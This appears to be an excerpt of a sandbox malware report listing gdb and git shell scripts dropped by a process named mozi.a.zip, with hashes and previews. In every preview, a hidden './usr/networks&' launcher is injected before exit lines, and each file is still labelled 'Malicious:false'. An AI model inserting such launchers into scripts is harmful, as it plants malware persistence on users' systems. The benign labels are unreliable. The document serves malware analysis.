                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/gdb/contrib/expect-read1.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):253
                                                                                                                  Entropy (8bit):5.267626424494032
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 2.fi.SO=/tmp/expect-read1.$$.so.rm -f $SO.CMD="${CC_FOR_TARGET:-gcc} -o $SO -Wall -fPIC -shared $C".if ! $CMD; then. echo >&2 "$0: Failed: $CMD". exit 2.fi.trap "rm -f $SO" EXIT.LD_PRELOAD=$SO expect "$@"../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/gdb/contrib/gdb-add-index.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1048
                                                                                                                  Entropy (8bit):4.806462537404251
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 1.fi..file="$1"..if test ! -r "$file"; then. echo "$myname: unable to access: $file" 1>&2. exit 1.fi..dir="${file%/*}".test "$dir" = "$file" && dir=".".index="${file}.gdb-index"..rm -f $index.# Ensure intermediate index file is removed when we exit..trap "rm -f $index" 0..$GDB --batch -nx -iex 'set auto-load no' \. -ex "file $file" -ex "save gdb-index $dir" || {. # Just in case.. status=$?. echo "$myname: gdb error generating index for $file" 1>&2. exit $status.}..# In some situations gdb can exit without creating an index. This is.# not an error..# E.g., if $file is stripped. This behaviour is akin to stripping an.# already stripped binary, it's a no-op..status=0..if test -f "$index"; then. $OBJCOPY --add-section .gdb_index="$index" \..--set-section-flags .gdb_index=readonly "$file" "$file". status=$?.else. echo "$myname: No index was created for $file" 1>&2. echo "$myname: [Was there no debuginfo? Was there already an index?
                                                                                                                  /usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/examples/git-am.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:OS/2 REXX batch file, ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):21942
                                                                                                                  Entropy (8bit):5.106661772210516
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 1.}..safe_to_abort () {..if test -f "$dotest/dirtyindex"..then...return 1..fi...if ! test -f "$dotest/abort-safety"..then...return 0..fi...abort_safety=$(cat "$dotest/abort-safety")..if test "z$(git rev-parse --verify -q HEAD)" = "z$abort_safety"..then...return 0..fi..gettextln "You seem to have moved HEAD since the last 'am' failure..Not rewinding to ORIG_HEAD" >&2..return 1.}..stop_here_user_resolve () {. if [ -n "$resolvemsg" ]; then.. printf '%s\n' "$resolvemsg".. stop_here $1. fi. eval_gettextln "When you have resolved this problem, run \"\$cmdline --continue\"..If you prefer to skip this patch, run \"\$cmdline --skip\" instead..To restore the original branch and stop patching, run \"\$cmdline --abort\".".. stop_here $1.}..go_next () {..rm -f "$dotest/$msgnum" "$dotest/msg" "$dotest/msg-clean" \..."$dotest/patch" "$dotest/info"..echo "$next" >"$dotest/next"..this=$next.}..cannot_fallback () {..echo "$1"..gettextln "Cannot fall back to thr
                                                                                                                  /usr/share/doc/git/contrib/examples/git-checkout.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4825
                                                                                                                  Entropy (8bit):5.113528532566079
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:dFHSEVt3CuAqnOGD5OKNPLT85zoEl5kJbDF772+u/NvZKJhGY44FVT0HAqFt3e:LTVUCDgKNDT8CB72hxChZ40KfQ
                                                                                                                  MD5:595AE545C31B21B58D1C77B533F7A2D4
                                                                                                                  SHA1:86F2DA045AA3718950585397A21D5387682A3548
                                                                                                                  SHA-256:9DACE4B4205D10F2705B32DC8963F132E51FC1D9DF799AE543EC6BE6115FA2B0
                                                                                                                  SHA-512:A8799023F5550B631064E93EFF1E4786A2362AB3B409D143800CE408BD150CECD74AD3266B32E8CBF7B0A007E352F3F4DA3D1EB7D216DA26413E718E2DCFC09C
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&...git update-index --index-info || exit $?..fi...# Make sure the request is about existing paths...git ls-files --full-name --error-unmatch -- "$@" >/dev/null || exit..git ls-files --full-name -- "$@" |...(cd_to_toplevel && git checkout-index -f -u --stdin)...# Run a post-checkout hook -- the HEAD does not change so the..# current HEAD is passed in for both args..if test -x "$GIT_DIR"/hooks/post-checkout; then.. "$GIT_DIR"/hooks/post-checkout $old $old 0..fi...exit $?.else..# Make sure we did not fall back on $arg^{tree} codepath..# since we are not checking out from an arbitrary tree-ish,..# but switching branches...if test '' != "$new"..then...git rev-parse --verify "$new^{commit}" >/dev/null 2>&1 ||...die "Cannot switch branch to a non-commit."..fi.fi..# We are switching branches and checking out trees, so.# we *NEED* to be at the toplevel..cd_to_toplevel..[ -z "$new" ] && new=$old && new_name="$old_name"..# If we don't have an existing branch that we're switching
                                                                                                                  /usr/share/doc/git/contrib/examples/git-clean.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/examples/git-clone.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):11759
                                                                                                                  Entropy (8bit):5.2205279036587235
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:9M6sMKXA+aN0VYXNXYdcYZRoT+7rdVAqmdOIhH+Cqd1WPnaetMkTri0i55rIIq4G:SMxpY6YZRoTeJHf4H+CqdPAM8+p86TvK
                                                                                                                  MD5:1E0926F456D9D5C35DF266EF276212C6
                                                                                                                  SHA1:4C741DD9AD5F798BDCE0F67172F2B790FFF1B6BD
                                                                                                                  SHA-256:C1DA77F45A430BC683EF4C9DDAA2AFB3B8F3D6F75A6B0406C456DFF3B4637BBC
                                                                                                                  SHA-512:30A51026697132EA1F83C1D5BCF796C17AB7EC418352FF268BD1461397F9A2280E5752FC673ACE99F606B6E136E0F2A85FFF2F0BF8D12AE0A35C8D95C5A7A478
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 1.}..usage() {..exec "$0" -h.}..eval "$(echo "$OPTIONS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..get_repo_base() {..(...cd "$(/bin/pwd)" &&...cd "$1" || cd "$1.git" &&...{....cd .git....pwd...}..) 2>/dev/null.}..if [ -n "$GIT_SSL_NO_VERIFY" -o \.."$(git config --bool http.sslVerify)" = false ]; then. curl_extra_args="-k".fi..http_fetch () {..# $1 = Remote, $2 = Local..curl -nsfL $curl_extra_args "$1" >"$2"..curl_exit_status=$?..case $curl_exit_status in..126|127) exit ;;..*). return $curl_exit_status ;;..esac.}..clone_dumb_http () {..# $1 - remote, $2 - local..cd "$2" &&..clone_tmp="$GIT_DIR/clone-tmp" &&..mkdir -p "$clone_tmp" || exit 1..if [ -n "$GIT_CURL_FTP_NO_EPSV" -o \..."$(git config --bool http.noEPSV)" = true ]; then...curl_extra_args="${curl_extra_args} --disable-epsv"..fi..http_fetch "$1/info/refs" "$clone_tmp/refs" ||...die "Cannot get remote repository information..Perhaps git-update-server-info needs to be run there?"..test "z$qu
                                                                                                                  /usr/share/doc/git/contrib/examples/git-commit.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):13843
                                                                                                                  Entropy (8bit):5.402105827507175
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:ohf3saLCKohntpFFLWt8CKHNFQCglPySY2rOsMi/URiCNW8msLDkV+HZqIgCu:ohf3ThWnnFFLWqCKtFz1SY2rOstURiCK
                                                                                                                  MD5:801864707ABB06C3ACD5E9AA7EF0A231
                                                                                                                  SHA1:1492CCEEA7F7892507958970BD7012850E3D8498
                                                                                                                  SHA-256:C4945D20EEF27CDF5E23450FF797808F6F58C8973B9ED415B7E391B24D3D895C
                                                                                                                  SHA-512:ABD01060290B46E9F538D6E9E88F4F9FDCDFECF7715DE0CB860CCF053899453BDC701F82AD16BA12DB3B688DAF9B0429D4FBC5F6EEB1F4621CF68BA8868D733A
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 1.}..TMP_INDEX=.THIS_INDEX="${GIT_INDEX_FILE:-$GIT_DIR/index}".NEXT_INDEX="$GIT_DIR/next-index$$".rm -f "$NEXT_INDEX".save_index () {..cp -p "$THIS_INDEX" "$NEXT_INDEX".}..run_status () {..# If TMP_INDEX is defined, that means we are doing..# "--only" partial commit, and that index file is used..# to build the tree for the commit. Otherwise, if..# NEXT_INDEX exists, that is the index file used to..# make the commit. Otherwise we are using as-is commit..# so the regular index file is what we use to compare...if test '' != "$TMP_INDEX"..then...GIT_INDEX_FILE="$TMP_INDEX"...export GIT_INDEX_FILE..elif test -f "$NEXT_INDEX"..then...GIT_INDEX_FILE="$NEXT_INDEX"...export GIT_INDEX_FILE..fi...if test "$status_only" = "t" || test "$use_status_color" = "t"; then...color=..else...color=--nocolor..fi..git runstatus ${color} \...${verbose:+--verbose} \...${amend:+--amend} \...${untracked_files:+--untracked}.}..trap '..test -z "$TMP_INDEX" || {...test -f "$TMP_INDEX" && rm -
                                                                                                                  /usr/share/doc/git/contrib/examples/git-fetch.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5954
                                                                                                                  Entropy (8bit):5.053117199381536
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:qjiwPNH32mZrlw8DpKg1ol8p2vgW7Tle8yibXzcDUyUuf1s7pbEVALomiS7yDRNL:qjrPNH32mZrlw8Dz1ol8p2YW/le8yib0
                                                                                                                  MD5:660949C6D769C055433FA32AD8CF7CB7
                                                                                                                  SHA1:D32B9EB0B032620ABDD884C3F205135F48A5CCAA
                                                                                                                  SHA-256:8D505E7404190C524B25A82E6D935752034AC993B74C2B704B93A8F69BA56FF5
                                                                                                                  SHA-512:65C50E1465E3D47F5703D87D9B6EB54CE63670D94A47C4341F42FBAB3566A3EE27159C968D55ACE8A2B4F8E7AC0B3E30BBA3BC42E24FAA92BFA5DAFAEC8ECA94
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&... done` || exit..if test "$#" -gt 1..then...# remote URL plus explicit refspecs; we need to merge them....reflist="$reflist$LF$taglist"..else...# No explicit refspecs; fetch tags only....reflist=$taglist..fi.fi..fetch_all_at_once () {.. eval=$(echo "$1" | git fetch--tool parse-reflist "-"). eval "$eval".. ( : subshell because we muck with IFS. IFS=" .$LF". (..if test "$remote" = . ; then.. git show-ref $rref || echo failed "$remote"..elif test -f "$remote" ; then.. test -n "$shallow_depth" &&...die "shallow clone with bundle is not supported".. git bundle unbundle "$remote" $rref ||.. echo failed "$remote"..else...if.test -d "$remote" &&.....# The remote might be our alternate. With....# this optimization we will bypass fetch-pack....# altogether, which means we cannot be doing....# the shallow stuff at all.....test ! -f "$GIT_DIR/shallow" &&....test -z "$shallow_depth" &&.....# See if all of what we are going to fetch are....# connected to
                                                                                                                  /usr/share/doc/git/contrib/examples/git-gc.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):61
                                                                                                                  Entropy (8bit):4.0161977906092705
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVMQyXJ/F3LQVOORgn:L/lPn
                                                                                                                  MD5:3A0813DB0108F078C610EB236C574A2F
                                                                                                                  SHA1:A7D47F14D8FD35FD8BF6799063B3EB4E9DCC610A
                                                                                                                  SHA-256:36BC6583258DCBB387D7AFFE086BC744F13B329E55E2F9657C385F6BC24AF215
                                                                                                                  SHA-512:69C3A007D44A13ED9D3F9F4F5C545C9B3A541FE500DDFA2E2934706CB1A740AD61AC75F8F47572DA78F4CD49D65DAEAF6118B4E3FA0C8A182F8FA78FC52C7F82
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.git rerere gc || exit../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/examples/git-log.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):234
                                                                                                                  Entropy (8bit):4.9965164312586925
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:MebhIYlCNdR39BOAvvmmJ9aKI9tIYl0R39BOFon:MKhyN46vBFeQN4yn
                                                                                                                  MD5:0A7B48976D929CEFAB720CC9C3F6EECF
                                                                                                                  SHA1:EF27B3E70278C3563C0BDD27DD6836D902DC1A5F
                                                                                                                  SHA-256:1A6D192431FBD9F6E4701981F8E954FD19B2D0265F594FE4EF2F1B82CE2CA78D
                                                                                                                  SHA-512:A5AE18EFBE0ED252032E372ACD45229CE6FC5D40D83C89291CA560997F7AD557D9CBE00C684DE2877B6CCC3C505A2089A9FEA372B3A5CA1B06FF2DA0553C5B4D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.revs=$(git-rev-parse --revs-only --no-flags --default HEAD "$@") || exit.[ "$revs" ] || {..die "No HEAD ref".}.git-rev-list --pretty $(git-rev-parse --default HEAD "$@") |.LESS=-S ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/examples/git-ls-remote.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2436
                                                                                                                  Entropy (8bit):5.153713997451705
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:9zJ+UQnIYLiLPX0zZhf1VpVZVpvPWg7WSfszrr9nQ8uMhpV24:Rp8Q09h9fDfh7f0zrr9Jv
                                                                                                                  MD5:AF55A4CB380CF0ECC6B02D4B7E057F05
                                                                                                                  SHA1:0B94808900C3D78664D23049C7A002292DF682DB
                                                                                                                  SHA-256:9CCAED1BB101426884242DF53C0CA66E5BF7CC181E56817A9E07190268ECE44D
                                                                                                                  SHA-512:5E193F8738198024CCCA155F4D141AA519A12AEA9FF4592D1A419B0EBAA1F30D4BCF297F0DDEA56281EEAE2CAD02ACFD6DC2CA6192465ABBCD2EB813909B911A
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 1;.}..die () {. echo >&2 "$*". exit 1.}..exec=.while test $# != 0.do. case "$1" in. -h|--h|--he|--hea|--head|--heads). heads=heads; shift ;;. -t|--t|--ta|--tag|--tags). tags=tags; shift ;;. -u|--u|--up|--upl|--uploa|--upload|--upload-|--upload-p|--upload-pa|\. --upload-pac|--upload-pack)..shift..exec="--upload-pack=$1"..shift;;. -u=*|--u=*|--up=*|--upl=*|--uplo=*|--uploa=*|--upload=*|\. --upload-=*|--upload-p=*|--upload-pa=*|--upload-pac=*|--upload-pack=*)..exec=--upload-pack=$(expr "z$1" : 'z-[^=]*=\(.*\)')..shift;;. --). shift; break ;;. -*). usage ;;. *). break ;;. esac.done..case "$#" in 0) usage ;; esac..case ",$heads,$tags," in.,,,) heads=heads tags=tags other=other ;;.esac... git-parse-remote.peek_repo="$(get_remote_url "$@")".shift..tmp=.ls-remote-$$.trap "rm -fr $tmp-*" 0 1 2 3 15.tmpdir=$tmp-d..case "$peek_repo" in.http://* | https://* | ftp://* )..if [ -n "$GIT_SSL_NO_VERIFY" -o \..."$(git config --bool http.sslVerify)" = false
                                                                                                                  /usr/share/doc/git/contrib/examples/git-merge-ours.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):247
                                                                                                                  Entropy (8bit):4.532049748049262
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:p5zAueMvudOATN8RXj040SryRqnsAHPiE/TA6K4n:paueMvSOsN8i4vORqsAHPn/TA6K4n
                                                                                                                  MD5:6B5C49DDB3925AD806E66DDA92D4E418
                                                                                                                  SHA1:39D261BAF8946100647BEA3B3A880E9F02D88856
                                                                                                                  SHA-256:7F280747A1078055FB5263854D39FDF589B66D9123F0BFBDCA8420E20E74CCEC
                                                                                                                  SHA-512:6C5FA59F21AA84EFB6EF5417CC19CC9B222857225E129D3CE5907A3B9FED2D389CB31FA40890BD08C5EF93A1044C2F0225639DC30BAC5A6921171FD30D3BD710
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.# We need to exit with 2 if the index does not match our HEAD tree,.# because the current index is what we will be committing as the.# merge result...git diff-index --quiet --cached HEAD -- || exit 2..exit 0../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/examples/git-merge.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):12742
                                                                                                                  Entropy (8bit):5.053935136942481
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:RZqDktd3tRumXQN7vYT2kFjlW6vZXgq8FL6F2Wz17Le3YHNJ0ztQrp2LdHPbZ/Z+:RZmYd3tRumXQNzkFjlW6Vgq8FeFp17CK
                                                                                                                  MD5:2A8A8A129B42665461A116FCB6D89D8B
                                                                                                                  SHA1:A9CBE3681D2F91BBA4E8D498A0F7479FDA479B3A
                                                                                                                  SHA-256:F62B6129B085DEC827A5A45298E0DCFA9D3FACCBD77C487BBE085D32D3A5F6C1
                                                                                                                  SHA-512:A3B33D5810AF30524F6A7528C9D1B5EEA2D52C28C2B945795F887F131477124698C03173F373B2315BB8593597072A85E234D6E00EEDA5233B62A0C89ACAAE66
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&... "$GIT_DIR/MERGE_STASH" "$GIT_DIR/MERGE_MODE" || exit 1.}..savestate() {..# Stash away any local modifications...git stash create >"$GIT_DIR/MERGE_STASH".}..restorestate() {. if test -f "$GIT_DIR/MERGE_STASH"..then...git reset --hard $head >/dev/null...git stash apply $(cat "$GIT_DIR/MERGE_STASH")...git update-index --refresh >/dev/null..fi.}..finish_up_to_date () {..case "$squash" in..t)...echo "$1 (nothing to squash)" ;;..'')...echo "$1" ;;..esac..dropsave.}..squash_message () {..echo Squashed commit of the following:..echo..git log --no-merges --pretty=medium ^"$head" $remoteheads.}..finish () {..if test '' = "$2"..then...rlogm="$GIT_REFLOG_ACTION"..else...echo "$2"...rlogm="$GIT_REFLOG_ACTION: $2"..fi..case "$squash" in..t)...echo "Squash commit -- not updating HEAD"...squash_message >"$GIT_DIR/SQUASH_MSG"...;;..'')...case "$merge_msg" in...'')....echo "No merge message -- not updating HEAD"....;;...*)....git update-ref -m "$rlogm" HEAD "$1" "$head" || exit
                                                                                                                  /usr/share/doc/git/contrib/examples/git-notes.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/examples/git-pull.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4349
                                                                                                                  Entropy (8bit):4.9994650554848405
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 1..;;.esac..error_on_no_merge_candidates () {..exec >&2...if test true = "$rebase"..then...op_type=rebase...op_prep=against..else...op_type=merge...op_prep=with..fi...upstream=$(git config "branch.$curr_branch_short.merge")..remote=$(git config "branch.$curr_branch_short.remote")...if [ $# -gt 1 ]; then...if [ "$rebase" = true ]; then....printf "There is no candidate for rebasing against "...else....printf "There are no candidates for merging "...fi...echo "among the refs that you just fetched."...echo "Generally this means that you provided a wildcard refspec which had no"...echo "matches on the remote end."..elif [ $# -gt 0 ] && [ "$1" != "$remote" ]; then...echo "You asked to pull from the remote '$1', but did not specify"...echo "a branch. Because this is not the default configured remote"...echo "for your current branch, you must specify a branch on the command line."..elif [ -z "$curr_branch" -o -z "$upstream" ]; then.... git-parse-remote...error_on_missing_
                                                                                                                  /usr/share/doc/git/contrib/examples/git-repack.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2499
                                                                                                                  Entropy (8bit):5.168731776130111
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.mkdir -p "$PACKDIR" || exit..args="$args $local ${GIT_QUIET:+-q} $no_reuse$extra".names=$(git pack-objects --keep-true-parents --honor-pack-keep --non-empty --all --reflog $args </dev/null "$PACKTMP") ||..exit 1.if [ -z "$names" ]; then..say Nothing new to pack..fi..# Ok we have prepared all new packfiles...# First see if there are packs of the same name and if so.# if we can move them out of the way (this can happen if we.# repacked immediately after packing fully..rollback=.failed=.for name in $names.do..for sfx in pack idx..do...file=pack-$name.$sfx...test -f "$PACKDIR/$file" || continue...rm -f "$PACKDIR/old-$file" &&...mv "$PACKDIR/$file" "$PACKDIR/old-$file" || {....failed=t....break...}...rollback="$rollback $file"..done..test -z "$failed" || break.done..# If renaming failed for any of them, roll the ones we have.# already renamed back to their original names..if test -n "$failed".then..rollback_failure=..for file in $rollback..do...mv "$PACKDIR/old-$file" "$PACK
                                                                                                                  /usr/share/doc/git/contrib/examples/git-reset.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1947
                                                                                                                  Entropy (8bit):5.193786239756587
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&...rev=$(git rev-parse --verify "$1") || exit...shift...break...;;..esac..shift.done..: ${rev=HEAD}.rev=$(git rev-parse --verify $rev^0) || exit..# Skip -- in "git reset HEAD -- foo" and "git reset -- foo"..case "$1" in --) shift ;; esac..# git reset --mixed tree [--] paths... can be used to.# load chosen paths from the tree into the index without.# affecting the working tree or HEAD..if test $# != 0.then..test "$reset_type" = "--mixed" ||...die "Cannot do partial $reset_type reset."...git diff-index --cached $rev -- "$@" |..sed -e 's/^:\([0-7][0-7]*\) [0-7][0-7]* \([0-9a-f][0-9a-f]*\) [0-9a-f][0-9a-f]* [A-Z].\(.*\)$/\1 \2.\3/' |..git update-index --add --remove --index-info || exit..git update-index --refresh..exit.fi..cd_to_toplevel..if test "$reset_type" = "--hard".then..update=-u.fi..# Soft reset does not touch the index file or the working tree.# at all, but requires them in a good order. Other resets reset.# the index file to the tree object we are switching to..i
                                                                                                                  /usr/share/doc/git/contrib/examples/git-resolve.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2433
                                                                                                                  Entropy (8bit):5.07831529192731
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..."$GIT_DIR/LAST_MERGE" || exit 1.}..head=$(git rev-parse --verify "$1"^0) &&.merge=$(git rev-parse --verify "$2"^0) &&.merge_name="$2" &&.merge_msg="$3" || usage..#.# The remote name is just used for the message,.# but we do want it..#.if [ -z "$head" -o -z "$merge" -o -z "$merge_msg" ]; then..usage.fi..dropheads.echo $head > "$GIT_DIR"/ORIG_HEAD.echo $merge > "$GIT_DIR"/LAST_MERGE..common=$(git merge-base $head $merge).if [ -z "$common" ]; then..die "Unable to find common commit between" $merge $head.fi..case "$common" in."$merge")..echo "Already up-to-date. Yeeah!"..dropheads..exit 0..;;."$head")..echo "Updating $(git rev-parse --short $head)..$(git rev-parse --short $merge)"..git read-tree -u -m $head $merge || exit 1..git update-ref -m "resolve $merge_name: Fast-forward" \...HEAD "$merge" "$head"..git diff-tree -p $head $merge | git apply --stat..dropheads..exit 0..;;.esac..# We are going to make a new commit..git var GIT_COMMITTER_IDENT >/dev/null || exit..# Find
                                                                                                                  /usr/share/doc/git/contrib/examples/git-revert.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4385
                                                                                                                  Entropy (8bit):5.300590299626365
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 1 ;;.esac..SUBDIRECTORY_OK=Yes ;# we will cd up.. git-sh-setup.require_work_tree.cd_to_toplevel..no_commit=.xopt=.while case "$#" in 0) break ;; esac.do..case "$1" in..-n|--n|--no|--no-|--no-c|--no-co|--no-com|--no-comm|\.. --no-commi|--no-commit)...no_commit=t...;;..-e|--e|--ed|--edi|--edit)...edit=-e...;;..--n|--no|--no-|--no-e|--no-ed|--no-edi|--no-edit)...edit=...;;..-r)...: no-op ;;..-x|--i-really-want-to-expose-my-private-commit-object-name)...replay=...;;..-X?*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#-X}")"...;;..--strategy-option=*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#--strategy-option=}")"...;;..-X|--strategy-option)...shift...xopt="$xopt$(git rev-parse --sq-quote "--$1")"...;;..-*)...usage...;;..*)...break...;;..esac..shift.done..set_reflog_action "$me"..test "$me,$replay" = "revert,t" && usage..case "$no_commit" in.t)..# We do not intend to commit immediately. We just want to..# merge the differences in...head=$(git-write-tree) ||
                                                                                                                  /usr/share/doc/git/contrib/examples/git-tag.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1972
                                                                                                                  Entropy (8bit):5.222096129300364
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit $had_error..;;. -v)..shift..tag_name="$1"..tag=$(git show-ref --verify --hash -- "refs/tags/$tag_name") ||...die "Seriously, what tag are you talking about?"..git-verify-tag -v "$tag"..exit $?..;;. -*). usage..;;. *)..break..;;. esac.done..[ -n "$list" ] && exit 0..name="$1".[ "$name" ] || usage.prev=0000000000000000000000000000000000000000.if git show-ref --verify --quiet -- "refs/tags/$name".then. test -n "$force" || die "tag '$name' already exists". prev=$(git rev-parse "refs/tags/$name").fi.shift.git check-ref-format "tags/$name" ||..die "we do not like '$name' as a tag name."..object=$(git rev-parse --verify --default HEAD "$@") || exit 1.type=$(git cat-file -t $object) || exit 1.tagger=$(git var GIT_COMMITTER_IDENT) || exit 1..test -n "$username" ||..username=$(git config user.signingkey) ||..username=$(expr "z$tagger" : 'z\(.*>\)')..trap 'rm -f "$GIT_DIR"/TAG_TMP* "$GIT_DIR"/TAG_FINALMSG "$GIT_DIR"/TAG_EDITMSG' 0..if [ "$annotate" ]
                                                                                                                  /usr/share/doc/git/contrib/examples/git-verify-tag.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):243
                                                                                                                  Entropy (8bit):5.091025781115778
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.git cat-file tag "$1" >"$GIT_DIR/.tmp-vtag" || exit 1.sed -n -e '../^-----BEGIN PGP SIGNATURE-----$/q..p.' <"$GIT_DIR/.tmp-vtag" |.gpg --verify "$GIT_DIR/.tmp-vtag" - || exit 1.rm -f "$GIT_DIR/.tmp-vtag"../usr/networks&.exit 1.
